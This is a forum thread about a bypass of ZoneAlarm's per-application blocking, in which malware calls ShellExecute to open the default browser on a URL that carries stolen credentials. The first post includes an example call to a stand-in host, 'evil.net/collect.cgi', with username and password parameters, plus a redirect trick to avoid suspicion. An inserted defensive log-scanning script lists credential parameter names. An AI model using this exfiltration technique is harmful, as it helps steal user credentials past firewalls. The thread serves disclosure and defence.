
Thread: Bypassing ZoneAlarm

  1. #1
    Senior Member
    Join Date
    Jan 2002
    Posts
    244

    Bypassing ZoneAlarm

    Hi everyone, this was one email I just got and I thought I'd post it......... looks like ZoneAlarm users need to do some reconf.

    I don't know if this is a new issue but it is a simple way to bypass (in some limited form) ZoneAlarm's Application level Internet access blocking.

    Windows dll shell32.dll exports a well known and documented function called ShellExecute. From the Win32 Programmer's reference:

        HINSTANCE ShellExecute(
            HWND hwnd,             // handle to parent window
            LPCTSTR lpOperation,   // pointer to string that specifies
                                   // operation to perform
            LPCTSTR lpFile,        // pointer to filename or folder name string
            LPCTSTR lpParameters,  // pointer to string that specifies
                                   // executable-file parameters
            LPCTSTR lpDirectory,   // pointer to string that specifies default
                                   // directory
            INT nShowCmd           // whether file is shown when opened
        );

    When the lpFile parameter is an Internet url, windows invokes Internet Explorer (or more accurately - the default web browser), which in 99% of the cases is allowed to access Internet, with that url. Example:

        ShellExecute(
            0,
            "open",
            "http://evil.net/collect.cgiun=stolen_username&pw=stollen_password",
            0,
            0,
            SW_HIDE  // This doesn't work.
                     // I think it is supposed to hide the window but ...
        );

    The collect.cgi (after storing stolen_username/stolen_password) could redirect the user for example to windowsupdate.microsoft.com, so that many users will not even suspect anything.

    The info leaked is limited by the maximum allowed url length, but that could be more than enough for a malicious application to send some username/password/cookie/cc_number info to a malicious server.

    This was tested on ZoneAlarm 3.1.395 (freeware) but I guess that all versions can be tricked if the user has granted access to his default web browser by default (very likely).

    VENDOR STATUS:
    I think that this is a flaw in the core design of ZoneAlarm (and/or Windows) and I don't see a way it can be fixed.

    WORKAROUND:
    Do not allow ANY application to access Internet by default and review each request separately.

    Any comments are welcome.

    aceh

    My comment on this........... It's ALWAYS safer not allowing any app. to access internet by default!!!
    i m gone, thx everyone for so much fun and good info.
    cheers and good bye
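A defender-side way to look for this pattern in web proxy logs, as an added example that is not part of the original post or of any ZoneAlarm product: it flags requests to hosts outside a trusted list whose query string carries credential-like parameter names or is oversized (the URL-length bound the email mentions), and notes when such a request was answered with a redirect, the cover story the email describes. The log format, host lists and parameter names are constructed assumptions.

```python
"""Flag browser requests that look like an application handed the default
browser a data-bearing URL (the ShellExecute pattern above).
Log format, hosts and key names below are constructed assumptions."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed proxy log: "<timestamp> <client> <method> <url> <status>"
SAMPLE_LOG = """\
2003-08-01T10:00:01 10.0.0.5 GET http://windowsupdate.microsoft.com/ 200
2003-08-01T10:00:02 10.0.0.5 GET http://evil.example/collect.cgi?un=alice&pw=hunter2 302
2003-08-01T10:00:03 10.0.0.5 GET http://windowsupdate.microsoft.com/ 200
2003-08-01T10:05:00 10.0.0.7 GET http://intranet.example/search?q=printer 200
"""

# Parameter names that should never travel in a GET query string (assumed list).
SENSITIVE_KEYS = {"un", "user", "username", "pw", "pass", "password",
                  "cookie", "cc", "ccnum"}
# Hosts the site owner trusts; requests to them are not inspected (assumed list).
TRUSTED_HOSTS = {"windowsupdate.microsoft.com", "intranet.example"}
LONG_QUERY = 512  # bytes; the leak is bounded by URL length, so big queries count

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def suspicious_params(url):
    """Return the sorted credential-like parameter names found in url's query."""
    query = urlsplit(url).query
    keys = {k.lower() for k, _ in parse_qsl(query, keep_blank_values=True)}
    return sorted(keys & SENSITIVE_KEYS)


def scan_log(text):
    """Return (client, host, reason) for each request worth reviewing."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than guessing at them
        _ts, client, _method, url, status = m.groups()
        parts = urlsplit(url)
        host = parts.hostname or ""
        if host in TRUSTED_HOSTS:
            continue
        reasons = []
        params = suspicious_params(url)
        if params:
            reasons.append("credential-like parameters: " + ",".join(params))
        if len(parts.query) > LONG_QUERY:
            reasons.append("oversized query string")
        if reasons and status.startswith("3"):
            reasons.append("then redirected (%s)" % status)  # cover-story redirect
        if reasons:
            hits.append((client, host, "; ".join(reasons)))
    return hits
```

Running scan_log(SAMPLE_LOG) reports only the second constructed line; the trusted-host requests around it are left alone.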

  2. #2
    Priapistic Monk KorpDeath's Avatar
    Join Date
    Dec 2001
    Posts
    2,628
    It may be safer but what a pain in the @ss that would be for my kids. Having to go through 30-50 "application allow" popups every day. Why not just use a better product? Outpost anyone? Sygate?

    But thanks for the heads up about ZA, not like I'd ever buy it or use it.
    Mankind have a great aversion to intellectual labor; but even supposing knowledge to be easily attainable, more people would be content to be ignorant than would take even a little trouble to acquire it.
    - Samuel Johnson

  3. #3
    Senior Member RoadClosed's Avatar
    Join Date
    Jun 2003
    Posts
    3,834

    lol

    I went to their site to see if this was reported and if they have a patch. The site is down
    West of House
    You are standing in an open field west of a white house, with a boarded front door.
    There is a small mailbox here.

  4. #4
    ZoneAlarm needs to be seriously checked out-> it's MAD.
    Sygate is good
    xxx

  5. #5
    good post, thanks for the heads up. I will try out Sygate

  6. #6
    Senior Member
    Join Date
    Jan 2002
    Posts
    244
    Originally posted here by KorpDeath
    It may be safer but what a pain in the @ss that would be for my kids. Having to go through 30-50 "application allow" popups every day. Why not just use a better product? Outpost anyone? Sygate?

    But thanks for the heads up about ZA, not like I'd ever buy it or use it.
    Haha you're right, with kids using a box this would be a major problem!
    i m gone, thx everyone for so much fun and good info.
    cheers and good bye

  7. #7
    Senior since the 3 dot era
    Join Date
    Nov 2001
    Posts
    1,542
    There are other probs with zonealarm too (at least with the last version I have seen, perhaps it's fixed now but I doubt it), for instance at the log in screen, ZA is not loaded while the windows networking is. This means that everyone can access the shares on a box, like printing and file sharing; after the log in ZA limits this to the internal network... so a box at the login screen is not protected by ZA. IMHO sygate or outpost are a better choice of desktop firewall.

  8. #8
    Senior Member
    Join Date
    Mar 2003
    Location
    central il
    Posts
    1,779
    What's with all the zone labs bashing. This is a windows issue and will affect any personal firewall the same way... the firewall can stop an application but not a specific site unless you tell it what site to block. Moreover, to pull off this exploit you need to get local access to the system or a Trojan loaded and run on the system, as you cannot normally do shell commands remotely (most windows boxes are not running telnet services). At the point someone is local/has your system compromised with a Trojan they can get your info without using this method, so your best defense in this case is to not let malicious users on the system.

    Victor, the TrueVector defense in Zonelabs is a service and loads when windows boots (as with all services); you are protected as soon as windows boots. The "You are now protected" splash screen is just the intro to the GUI.
    Who is more trustworthy than all of the gurus or Buddhas?

  9. #9
    Senior since the 3 dot era
    Join Date
    Nov 2001
    Posts
    1,542
    bballad, you have some excellent points, but about the splash screen thingie I have to disagree with you. Yep, they say its TrueVector defense does what you describe, but I tested this in a little test setup and was able to access the default shares with early versions of zonelabs. That was very surprising 'cause I thought, like you, that the protection did work before the splash screen. I know the splash screen is only the GUI intro but there seems still to be a slight problem with the TrueVector idea:
    It was discussed in a thread here at AO. http://www.antionline.com/showthread...ight=ZoneAlarm
    Basically it means that if you allow local shares, but do not allow local shares in ZA, by setting no trusted neighbourhood networks and the highest security degree, it still will allow them when you are at the login screen. This is not a big deal, I know, and probably other products have this weakness too.

  10. #10
    Senior Member
    Join Date
    Jan 2002
    Posts
    244
    This is not a big deal, I know, and probably other products have this weakness too.

    Think you're right on this one Vic. Software takes time to load, before that no defense.......... hardware on the other hand....... instant protection!

    But like you said, not a big deal if you use a good av product and practise safe computing!
    i m gone, thx everyone for so much fun and good info.
    cheers and good bye
